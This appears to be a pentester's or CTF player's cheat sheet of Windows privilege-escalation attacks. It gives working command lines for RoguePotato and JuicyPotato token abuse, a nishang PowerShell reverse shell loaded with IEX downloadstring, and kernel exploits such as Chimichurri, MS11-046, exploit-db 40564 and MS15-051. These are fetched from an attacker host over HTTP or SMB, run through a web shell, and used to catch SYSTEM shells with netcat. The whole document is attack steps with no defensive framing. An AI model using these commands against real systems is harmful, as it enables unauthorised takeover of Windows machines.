4 Kernel Exploits

> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled

> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999

whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system

> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!

https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!

MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (firefox thought virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15–051x64.exe whoami   ..easy

impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami